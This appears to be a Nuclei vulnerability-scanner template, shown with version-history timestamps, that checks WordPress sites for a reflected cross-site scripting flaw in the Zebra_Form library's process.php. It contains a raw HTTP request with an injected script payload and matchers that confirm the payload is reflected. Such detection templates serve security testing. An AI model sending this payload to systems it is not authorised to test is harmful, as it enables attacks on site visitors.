nuclei-templates/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml

44 lines
1.5 KiB
YAML
Raw Normal View History

2021-02-15 18:58:11 +00:00
id: wordpress-zebra-form-xss
2021-02-15 10:43:31 +00:00
info:
2022-08-10 09:18:17 +00:00
name: Zebra_Form Library <= 2.9.8 - Cross-Site Scripting (XSS)
2021-02-15 10:43:31 +00:00
author: madrobot
severity: medium
2022-08-10 09:18:17 +00:00
description: |
The Zebra_Form PHP library v2.9.8 (latest) and below, used by some WordPress plugins, is affected by reflected Cross-Site Scripting issues in its process.php file.
reference:
- https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
- https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
tags: wordpress,xss,wp,wpscan
2021-02-15 10:43:31 +00:00
requests:
- raw:
- |
2022-08-10 09:18:17 +00:00
POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1
2021-02-15 10:43:31 +00:00
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
Origin: null
-----------------------------77916619616724262872902741074
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt"
2021-02-15 10:43:31 +00:00
Content-Type: text/plain
Test
-----------------------------77916619616724262872902741074--
matchers-condition: and
matchers:
- type: word
part: body
2022-08-10 09:18:17 +00:00
words:
- "</script><img src onerror=alert(document.domain)>"
2021-02-15 18:58:11 +00:00
- type: word
2022-08-10 09:18:17 +00:00
part: header
2021-02-15 18:58:11 +00:00
words:
- "text/html"
2022-08-10 09:18:17 +00:00
- type: status
status:
- 200